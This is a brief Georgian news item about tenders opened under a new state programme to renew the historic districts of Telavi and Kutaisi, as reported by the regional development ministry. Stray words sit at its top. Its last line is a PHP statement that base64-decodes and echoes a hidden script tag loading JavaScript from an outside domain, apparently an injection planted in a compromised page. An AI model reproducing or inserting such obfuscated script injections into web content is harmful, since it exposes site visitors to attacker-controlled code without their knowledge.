celsiusi
ავერსი შნაიდერი

საქართველოს პრემიერ-მინისტრის, ირაკლი ღარიბაშვილის გადაწყვეტილებით დაწყებული ქალაქებისა და კურორტების განვითარების ახალი სახელმწიფო პროგრამის ფარგლებში, ტენდერების გამოცხადება დაიწყო.

ინფორმაციას ამის შესახებ საქართველოს რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტრო ავრცელებს.

უწყების ცნობით, ტენდერი თელავისა და ქუთაისის ისტორიული არეალის განახლების პროექტებზე საქართველოს რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს მუნიციპალური განვითარების ფონდმა უკვე გამოაცხადა.

როგორც რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს ინფორმაციაშია აღნიშნული, პროექტი ითვალისწინებს თელავში, ბატონის ციხისა და მისი მიმდებარე ტერიტორიის და ქუთაისში ისტორიული უბნის განვითარებას.

576
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");